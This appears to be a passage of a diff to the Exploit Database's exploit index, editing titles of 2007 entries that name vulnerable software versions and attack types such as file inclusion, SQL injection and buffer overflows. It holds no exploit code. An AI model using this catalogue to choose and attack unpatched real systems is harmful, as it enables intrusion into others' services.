Execution Exploit",2007-04-11,DarkFig,php,webapps,0 -3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion Exploit",2007-04-11,"John Martinelli",php,webapps,0 -3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 +3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal Exploit",2007-04-11,shinnai,multiple,remote,0 +3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 +3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,php,webapps,0 +3711,platforms/php/webapps/3711.htm,"CodeBreak 1.1.2 - (codebreak.php) Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps,0 +3712,platforms/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3713,platforms/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 -3714,platforms/php/webapps/3714.txt,"joomla component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 +3714,platforms/php/webapps/3714.txt,"joomla Component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps,0 3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Request Denial of Service",2007-04-12,shinnai,windows,dos,0 -3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion Exploit",2007-04-12,bd0rk,php,webapps,0 -3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - (absolute_path) Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 +3716,platforms/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - (getinfo1.php) Remote File Inclusion",2007-04-12,bd0rk,php,webapps,0 +3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - (header.php lang) Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - (CLIENT-IP) SQL Injection",2007-04-12,Elekt,php,webapps,0 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - (mailout.php) Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 -3724,platforms/linux/remote/3724.c,"Aircrack-ng 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow Exploit",2007-04-12,"Jonathan So",linux,remote,0 -3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 +3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow Exploit",2007-04-12,"Jonathan So",linux,remote,0 +3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0 -3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 +3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 @@ -3391,34 +3392,34 @@ id,file,description,date,author,platform,type,port 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 -3735,platforms/php/webapps/3735.txt,"LS Simple GuestBook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 -3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 +3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 +3736,platforms/php/webapps/3736.txt,"mambo/joomla Component article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow Exploit",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 -3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0 +3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 - (GALLERY_BASEDIR) Multiple Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 - (arashlib_dir) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 - (path) Remote File Inclusion",2007-04-15,GoLd_M,php,webapps,0 -3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 +3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC - Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 - (scr/soustab.php) Local File Inclusion",2007-04-16,GoLd_M,php,webapps,0 -3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - (abs_path) Remote File Inclusion",2007-04-16,irvian,php,webapps,0 +3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery - (GALLERY_BASEDIR) Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps,0 3750,platforms/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps,0 3751,platforms/php/webapps/3751.txt,"Anthologia 0.5.2 - (index.php ads_file) Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3752,platforms/php/webapps/3752.txt,"AjPortal2Php - (PagePrefix) Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE - (CAltInstaller.php) Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 -3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0 +3754,platforms/php/webapps/3754.pl,"MiniGal b13 - (image backdoor) Remote Code Execution",2007-04-17,Dj7xpl,php,webapps,0 3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String Exploit",2007-04-17,jamikazu,windows,local,0 3758,platforms/php/webapps/3758.php,"ShoutPro 1.5.2 - (shout.php) Remote Code Injection",2007-04-17,Gammarays,php,webapps,0 -3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - 'index.php' Remote File Inclusion Exploit",2007-04-17,"Cold Zero",php,webapps,0 +3759,platforms/php/webapps/3759.pl,"Joomla Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps,0 3760,platforms/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 -3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 +3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 @@ -3428,31 +3429,31 @@ id,file,description,date,author,platform,type,port 3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion",2007-04-21,GoLd_M,php,webapps,0 -3772,platforms/windows/local/3772.c,"Photofiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0 +3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0 3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0 -3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion Exploit",2007-04-23,g00ns,php,webapps,0 +3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion",2007-04-23,g00ns,php,webapps,0 3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow",2007-04-23,Marsu,windows,local,0 3780,platforms/php/webapps/3780.pl,"MyBulletinBoard - (MyBB) 1.2.5 calendar.php Blind SQL Injection",2007-04-23,0x86,php,webapps,0 3781,platforms/php/webapps/3781.txt,"Joomla 1.5.0 Beta - (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 3782,platforms/windows/dos/3782.pl,"Winamp 5.33 - '.avi' Remote Denial of Service",2007-04-23,DeltahackingTEAM,windows,dos,0 3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - (navigator_ok.php asolute) Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 3784,platforms/multiple/dos/3784.c,"Opera 9.2 - '.torrent' Remote Denial of Service",2007-04-23,n00b,multiple,dos,0 -3785,platforms/php/webapps/3785.txt,"Post Revolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 +3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusion",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3789,platforms/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 3790,platforms/windows/dos/3790.html,"NetSprint Toolbar - ActiveX toolbar.dll Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 -3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 - \377 character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 +3791,platforms/hardware/dos/3791.pl,"Linksys SPA941 - \377 Character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - (remote reboot) Remote Denial of Service",2007-04-24,MADYNES,hardware,dos,0 -3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified .bmp File Buffer Overflow",2007-04-24,Marsu,windows,local,0 +3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 - / CS3 Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0 3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion",2007-04-24,DamaR,php,webapps,0 -3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion Exploit",2007-04-24,kezzap66345,php,webapps,0 +3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0 3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 @@ -3467,30 +3468,30 @@ id,file,description,date,author,platform,type,port 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow Exploit",2007-04-27,"Umesh Wanve",windows,remote,0 -3811,platforms/windows/local/3811.c,"IrfanView 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 +3811,platforms/windows/local/3811.c,"Irfanview 4.00 - '.iff' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 -3814,platforms/php/webapps/3814.txt,"Wordpress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 +3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection",2007-04-29,rgod,php,webapps,0 3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 -3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 +3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows/x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0 -3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution Exploit",2007-04-30,Marsu,windows,local,0 -3824,platforms/php/webapps/3824.txt,"Wordpress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"Wordpress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 +3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"Wordpress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 +3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 -3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 -3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 +3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 +3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 @@ -3507,14 +3508,14 @@ id,file,description,date,author,platform,type,port 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection",2007-05-04,rgod,php,webapps,0 -3851,platforms/multiple/dos/3851.c,"Multiple vendors - ZOO file decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos,0 +3851,platforms/multiple/dos/3851.c,"Multiple vendors - ZOO file Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local Buffer Overflow Exploit",2007-05-05,shinnai,windows,local,0 -3857,platforms/php/webapps/3857.txt,"vm watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 -3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution Exploit",2007-05-05,DarkFig,php,webapps,0 +3857,platforms/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 +3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps,0 3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 @@ -3535,16 +3536,16 @@ id,file,description,date,author,platform,type,port 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 -3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion Exploit",2007-05-09,GoLd_M,php,webapps,0 +3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3882,platforms/windows/remote/3882.html,"BarCodeWiz ActiveX Control 2.52 - (BarcodeWiz.dll) SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 -3883,platforms/windows/dos/3883.html,"BarCodeWiz ActiveX Control 2.0 - (BarcodeWiz.dll) Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 +3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - (Barcodewiz.dll) SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 +3883,platforms/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - (Barcodewiz.dll) Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 -3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows/x86) - (.ras) Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 +3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows/x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 @@ -3552,15 +3553,15 @@ id,file,description,date,author,platform,type,port 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 -3897,platforms/windows/local/3897.c,"eTrust Antivirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 +3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - hpqvwocx.dll ActiveX Magview Overflow (PoC)",2007-05-11,callAX,windows,dos,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (PHPThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 -3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution Exploit",2007-05-11,Dj7xpl,php,webapps,0 -3905,platforms/asp/webapps/3905.txt,"W1L3D4 Philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0 -3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion Exploit",2007-05-12,Dj7xpl,php,webapps,0 